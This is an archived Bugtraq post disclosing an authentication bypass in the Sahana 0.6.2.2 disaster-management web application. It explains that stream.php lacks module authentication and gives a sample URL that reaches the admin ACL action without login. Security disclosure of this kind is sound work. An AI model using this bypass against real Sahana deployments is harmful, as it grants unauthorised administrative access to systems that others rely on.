[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Sahana 0.6.2.2 Authentication Bypass

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Sahana 0.6.2.2 Authentication Bypass
From: Christopher <vooduhal@xxxxxxxxx>
Date: Wed, 17 Mar 2010 12:54:30 -0400

Ability to completely disable authentication via stream.php and commented
out module authentication code within it.

http://victim/<sahana_path>/index.php?mod=admin&act=acl_enable_acl
Authenticates correctly.

http://victim/<sahana_path>/stream.php?mod=admin&act=acl_enable_acl
Does not.

Prev by Date: Secunia Research: Quicksilver Forums "mysqldump" Password Disclosure
Next by Date: CA20100318-01: Security Notice for CA ARCserve Backup
Previous by thread: Secunia Research: Quicksilver Forums "mysqldump" Password Disclosure
Next by thread: CA20100318-01: Security Notice for CA ARCserve Backup
Index(es):
- Date
- Thread